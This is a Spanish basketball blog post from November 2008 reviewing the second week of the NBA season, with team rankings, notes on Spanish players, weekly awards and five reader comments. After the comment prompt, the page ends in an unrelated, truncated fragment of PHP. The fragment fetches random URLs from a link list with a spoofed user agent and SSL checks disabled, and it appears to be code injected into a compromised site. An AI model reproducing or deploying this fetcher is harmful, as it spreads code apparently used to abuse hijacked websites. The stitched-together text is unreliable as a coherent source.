Informe semanal TJ (Semana 2)

10 de November de 2008 por TheDeerHunter

Por TheDeerHunter & MagicJohnson32

Segunda semana de competición y segundo informe semanal, un repaso a los equipos más en forma, a aquellos a los que se les está haciendo cuesta arriba este inicio de temporada y a la actuación de los españoles. Y de postre, nuestras particulares conclusiones.

ON FIRE

El Este ha estado que lo rompe esta semana. De esta conferencia han sido varios de los que han mostrado un estado de forma hasta sorprendente, en algunos casos. Destaca por encima de todos Atlanta Hawks, que siguen inesperadamente primeros e imbatibles, castigando bien el cuerpo a gallos como Hornets o Raptors. Será difícil que se mantengan de esta guisa a largo plazo, sobre todo estas próximas semanas sin Josh Smith, pero hasta el momento su espectacular defensa y su segunda línea encabezada por Flip Murray son dos activos bien seguros. Más habitual será encontrar en esta categoría a los verdaderos cocos de la conferencia. LeBron no ha tardado en mostrar su cara MVP y Celtics y Orlando se han puesto las pilas. Resultado: todo victorias.

Por el Oeste, los Lakers siguen a lo suyo. Sin despeinarse, mejor ataque y mejor defensa de la liga. Con todo, únicamente podemos decir que han jugado un partido de “su liga” esta semana. Habrá que esperar para hacer análisis más profundos sobre ellos.

Por último se cuelan sorprendentemente en esta categoría dos habituales de la zona baja.  Fue criticar a Zach Randolph desde estos lares y salirse por todos lados, junto a sus Knicks, que no conocen la derrota esta semana. Sí la conocen los Kings, pero debemos destacar sus 3 victorias seguidas. Brad Miller se nota.

AL TRAN-TRAN

Encabeza esta categoría  Utah por culpa del traspiés que tuvo anoche en el Madison. Con lo que están mostrando sin Deron Williams será difícil sacarlos de los análisis más optimistas cuando él esté. Los Suns también se muestran sólidos. La planificación deportiva del “perro grande” puede hacerles perder regularidad y el sistema no termina de resultar del todo digerible para alguno de sus pilares pero aun así ya se ve que hay que sudar para  ganarles. En Denver se agradece la llegada de Billups y más se hubiera agradecido de haberse podido quedar con McDyess, aunque ya eran de los que estaban jugando bien desde el principio. Portland han salido vivos del tremendo calendario que les había tocado en suerte. Tan acostumbrados están a jugar sin Oden que algunos ya dudan que sea capaz de mejorar significativamente el producto. Hay que pensar que sí lo hará.

Cuidadito con Miami y Memphis, que han dado ya unos cuantos disgustos a equipos teóricamente bastante más potentes que los suyos.  Chicago no está jugando mal, pero hay que ser conscientes de que su guerra no es contra Cleveland y un LeBron en estado de gracia.

EL BORDE EL ABISMO

Semanita de pasión para muchos. Los Hornets han tenido que esperar a tener completo el equipo para empezar a cagarla. Se puede perder contra Atlanta en un mal día, pero ¿contra Bobcats? A Detroit también se le ha indigestado (la llegada de Iverson) la pérdida de Billups y McDyess. Toronto se ha mostrado preocupantemente flojo contra los rivales directos a los que se ha enfrentado esta semana aunque tiene margen de mejora. Lo mismo elevado al extremo le ha sucedido a Houston, que tendrá que hacer profunda autocrítica a fin de analizar adónde quiere dirigirse realmente esta campaña. Si sus espadas juegan a este (bajo) nivel se verán obligados a revisar objetivos y a reorientar posturas. Otros equipos con balance negativo han sido Milwaukee, Indiana o New Jersey.

EL POZO

Hay que ver la de equipos que se pelean por aparecer destacados en esta categoría. Es triste pero hay que decirlo: Alerta Roja en San Antonio. Van a perder casi todo lo que jueguen sin Parker y van a sufrir muchísimo lo que jueguen sin Ginóbili. Aún queda mucho para vislumbrar recuperación en el enfermo, lo que hace intuir cambios profundos en un futuro inmediato. Del resto de ilustres en la UCI es noticia la primera victoria de Clippers. Horripilantes Sixers y Dallas. Malos tiempos para la lírica en Golden State. Harrington abandona el barco al igual que otros muchos que querrán hacerlo también en Charlotte. Cuchara de madera para Thunder, Timberwolves y Wizards, empatados con 0 victorias durante la semana.

LOS ESPAÑOLES

Pau y Rudy han sido los más regulares en sus potentes equipos. No es que se hayan salido, pero lo han hecho bien noche tras noche. En el caso de Rudy, ha presentado sus credenciales a RoY y eso es mucho decir tal y como está el patio. Calderón y Marc, en cambio, han hecho actuaciones sobresalientes puntualmente pero no han mantenido una línea constante de juego.

No obstante todo, el caso más noticioso con respecto a los españoles esta semana ha sido el de Sergio, que finalmente ha reaccionado en público a su pésima situación en Portland. Como consecuencia de esto Pritchard ha manifestado que “tararí que te vi” y que Sergio cuenta mucho para la franquicia. Será que les gusta que salga en la foto de la plantilla.

LAS CONCLUSIONES

Ahora que todos los equipos han disputado al menos 5 partidos podemos empezar a sacar conclusiones con una mayor base:

– La primera conclusión es tan obvia que no se puede dejar pasar: Denver con Iverson presentaba un balance de 1 victoria y 2 derrotas; Denver con Billups suma 2 victorias y 0 derrotas. Detroit con Billups acumulaba 2 victorias y 0 derrotas; Detroit con Iverson ya lleva 0 victorias y 2 derrotas. Balance de Allen Iverson: 1 victoria y 4 derrotas; Balance de Billups, 4 victorias, 0 derrotas. Conclusión: Si Hamilton sigue haciendo 0 de 8 en tiros como anoche, Iverson tardará en estrenarse.

Atlanta es uno de los dos equipos de la liga que permanecen invictos. Su quinta victoria llegó sin Josh Smith, que permanecerá entre 2 y 4 semanas lesionado por un esguince de tobillo. Joe Johnson, sensacional en el inicio de temporada, se las arregló para vencer a los Thunder. Chicago y Boston esperan martes y miércoles. Dudo que los Hawks lleguen al jueves sin conocer la derrota. Celtics, Magic y Cavs ya han cogido el tono y es cuestión de tiempo que se restablezca el orden lógico en el Este.

– El otro equipo que cuenta sus partidos por victorias son los Lakers. Cada actualización que hacemos de sus números colectivos resulta más espectacular. Tras aplastar anoche a los Rockets, con un parcial de 95-50 en los últimos 35 minutos de partido, los Lakers son el equipo más anotador de la liga  (106.8 puntos por partido) y el equipo que menos puntos encaja (84.4). El cálculo es fácil: han ganado sus cinco encuentros por una diferencia de 22.4 puntos. Las visitas a Dallas y New Orleans serán una buena prueba para Jackson, Bryant, Gasol y compañía, aunque ya dijimos eso de sus duelos contra Portland y Houston, que despacharon con enorme facilidad.

– Hablando de los Mavericks, la obligada transición que supone el cambio de entrenador está siendo complicada. Al margen de Nowitzki, que salvo su horrible actuación ante los Cavs anota siempre por encima de la veintena de puntos, la única vía fiable de anotación del equipo estaba siendo Josh Howard, que ante los Clippers fue baja por una lesión en la muñeca. Terry es cualquier cosa menos fiable, capaz de hacer 13 de 21 en tiros o 3 de 15, y casi más propenso a lo segundo que a lo primero. Con este panorama, Kidd ha de ser capaz de asumir mayores responsabilidades ofensivas. Él puede y sabe hacerlo, como demostró el día de Denver; para algo lo trajeron y por algo cobra más de 21 millones de dólares al año.

– Cuánto dan de sí los Rockets. Siempre ofrecen debate. Por ejemplo, los porcentajes de tiro de sus titulares: Scola es el único que se salva, con cerca del 57% de acierto. Le sigue de lejos Yao, con casi un 45%; McGrady apenas llega al 40%, Artest está en 35% y Alston ni siquiera alcanza el 30%. Aunque el debate lo ha de centrar necesariamente McGrady y sus dos últimas actuaciones: 0 de 5 en tiros y 2 puntos en 26 minutos ante los Clippers, y 1 de 11 en tiros y 3 puntos en 32 minutos ante los Lakers. Lástima que ya no esté Van Gundy para echarle la culpa.

– Los Wizards siguen sin ganar. La buena noticia es Nick Young, al nivel de los mejores sextos hombres de la liga. La mala es todo lo demás. Daniels, Songaila y Etan Thomas ya se han pedido algún partido por lesión. A ver cuánto resisten Butler y Jamison.

– Y si de lesiones va el asunto, en San Antonio tienen motivos para el pesimismo. Los Spurs han ganado un solo partido y Tony Parker, como ya sabéis, se suma a Ginóbili en la enfermería. El base francés, espectacular en el inicio de temporada pese a los malos resultados de su equipo, estará un mes de baja por un esguince de grado 2 y deja así a Tim Duncan solo en el Wild West. Sabemos lo bueno que es Duncan pero 4 semanas con Roger Mason como mejor segunda opción no ofrecen una perspectiva muy halagüeña.

PREMIOS TJ, edición semanal:

MVP: El galardón de jugador más valioso de la semana recae en LeBron James, que ha promediado 34.5 puntos, 9.8 rebotes y 5.3 asistencias en las cuatro victorias de su equipo. Ya hasta mete los tiros libres. Merece mención también Dwayne Wade, con unos espectaculares 30.7 puntos, 7.7 rebotes, 8.3 asistencias, robos y 1.7 tapones por noche.

El rookie: Derrick Rose, con 17.3 puntos, 5.8 asistencias y 3.3 rebotes, y OJ Mayo, con 23 puntos, 5.5 rebotes, 2.5 asistencias y 1.3 robos, han sido los debutantes más destacados de la semana. Beasley y Kevin Love también empiezan a responder a las expectativas.

La sorpresa: Una de las sorpresas agradables del inicio de campaña es el buen nivel de Nené Hilario, que en esta pasada semana ha promediado 18.7 puntos, 11.3 rebotes y 2.3 tapones. Idéntica media de puntos, pero acompañada por 4.7 asistencias, ha hecho Ramon Sessions para firmar una muy buena semana pese a su mala actuación en Boston.

La decepción: Tracy McGrady, por todo lo dicho con anterioridad. Un jugador con su condición de súper estrella no puede permitirse dos actuaciones como las últimas protagonizadas, y mucho menos de forma consecutiva.

Comenta

5 comentarios a esta entrada

  1. Jabho dice:
    #1

    Bufff… los Lakers de verdad que asustan. No por ganar, sino por la facilidad con que lo hacen. Supongo que en algún momento bajaran el ritmo pero con la profundidad de banquillo y lo buenos que son…. miedito están metiendo.

    Mis C´s bien. Al tran, tran como debe ser. Pero creo que un paso por detrás de los amarillos, lamentablemente.

    Me alegro mucho por Nene. Ojala siga sano y a este nivelón.

    Por cierto. El salvaje Oeste con el bajón de Dallas y Spurs empieza a parecerlo menos ¿no? ya he leído a algún analista que este año el Este podía ganar mas partidos que el Oeste…. Yo creo que aun es pronto, pero si es cierto que empiezan a verse mas equipos competitivos en el Este y que el Oeste tiene algunos de los peores y los de nivel medio van bajando. A ver somo sigue la cosa.

      Citar

  2. viru dice:
    #2

    Sensacional analisis, como siempre. Coincido con Jabho: el banquillo de Lakers esta fenomenal, y con eso y sus rivales en el oeste bajan, este año pueden llegar mas descansados a la postemporada. A ver que pasa.

      Citar

  3. TheDeerHunter dice:
    #3

    Lebron y Stoudemire jugadores de la semana. Por una vez hemos coincidido 😀

    Por otro lado, Hinrich 3 meses de baja. Ahora Del Negro lo tiene más claro para poder poner a Shelophosha sin que nadie piense que se ha vuelto gilip…

      Citar

  4. MagicJohnson32 dice:
    #4

    El otro día pensaba en lo que dice Jabho. Tal vez sea cosa del inicio de temporada, de las lesiones de los Spurs, el cambio de entrenador de los Suns, la adaptación de Artest a los Rockets, las bajas de Deron y Oden… pero el Oeste parece menos mientras el Este parece más.

    Dejemos que pasen una semanas antes de considerarlo un hecho, pero ya se apunta la tendencia.

      Citar

  5. Viva_Dirk dice:
    #5

    Hombre, a la bajada de los Spurs o los Mavs le contrarrestan la subida de Portland, y veremos Denver con Billups donde llega. Los Jazzs sin Deron ya estan siendo muy jodidos, asi que con el, un terrible rival.

    En el Este los equipos que se han sumado no han terminado de hacerlo, veremos balances a final de temporada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>